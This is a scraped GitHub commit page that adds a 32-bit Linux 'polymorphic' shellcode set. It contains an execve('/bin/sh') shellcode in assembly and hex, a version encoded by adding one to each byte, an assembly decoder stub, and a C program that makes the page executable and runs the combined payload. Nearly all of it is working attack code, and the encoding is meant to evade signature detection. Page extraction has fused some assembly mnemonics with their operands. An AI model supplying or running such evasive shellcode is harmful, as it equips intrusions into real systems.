Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit 5999dc0

Browse files
committed
update
1 parent 78111fd commit 5999dc0

File tree

4 files changed

+91
-0
lines changed

4 files changed

+91
-0
lines changed

‎32/polymorphic_sh/sh_shellcode.asm

Lines changed: 36 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,36 @@
1+
;Shellcode execve(/bin/sh, NULL, NULL) polymorphic
2+
[SECTION .text]
3+
4+
global _start
5+
6+
_shellcode_start:
7+
8+
xoreax,eax ; clear EAX
9+
10+
; prepare first argument of execve /bin/sh in EBX
11+
12+
pusheax ; NULL byte
13+
push0x68732f2f ; //sh
14+
push0x6e69622f ; /bin
15+
movebx,esp ; ptr to /bin/sh
16+
17+
; prepare second argument of execve NULL in ECX
18+
19+
xorecx,ecx
20+
21+
; prepare third argument of execve NULL in EDX
22+
23+
xoredx,edx
24+
25+
; syscall execve(/bin/sh, NULL, NULL)
26+
27+
moval,0xb ; Syscall 11 execve
28+
int0x80 ; Syscall
29+
30+
; exit 0 syscall
31+
32+
xoreax,eax ; clear EAX
33+
moval,1 ; Syscall 1 exit
34+
xorebx,ebx ; clear EBX
35+
int0x80 ; Syscall
36+

‎32/polymorphic_sh/sh_shellcode.hex.enc

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
Shellcode /bin/sh execve
2+
3+
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80
4+
5+
Encoded Shellcode /bin/sh execve polymorphic +1 for each bytes
6+
7+
\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x32\xca\x32\xd3\xb1\x0c\xce\x81\x32\xc1\xb1\x02\x32\xdc\xce\x81

‎32/polymorphic_sh/shellcode_decoder.asm

Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
[SECTION .text]
2+
3+
global_start
4+
5+
_start:
6+
7+
jmp short initialize
8+
9+
handlemySC:
10+
11+
popesi
12+
xorecx,ecx
13+
movcl,31 ; shellcode size
14+
15+
decode:
16+
17+
sub byte [esi+ecx-1],1
18+
subcl,1
19+
jnz decode
20+
jmp short execmySC
21+
22+
initialize:
23+
24+
call handlemySC
25+
26+
execmySC:

‎32/polymorphic_sh/shellcode_executor.c

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
#include <stdio.h>
2+
#include <sys/mman.h>
3+
#include <stdint.h>
4+
#include <string.h>
5+
6+
typedef void pf_t(void);
7+
8+
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x1f\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x32\xca\x32\xd3\xb1\x0c\xce\x81\x32\xc1\xb1\x02\x32\xdc\xce\x81";
9+
10+
// decoder_shellcode + bin_sh_shellcode_encoded
11+
12+
int main(){
13+
14+
printf("Shellcode length : %d bytes", strlen(shellcode));
15+
// Prints shellcode length in bytes
16+
mprotect((pf_t*)((uint64_t)shellcode & ~4095), 4096, 0x6);
17+
// PROT_EXEC | PROC_WRITE on page that contains the shellcode
18+
((pf_t*) shellcode)();
19+
// Execute the shellcode
20+
return 0;
21+
22+
}

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /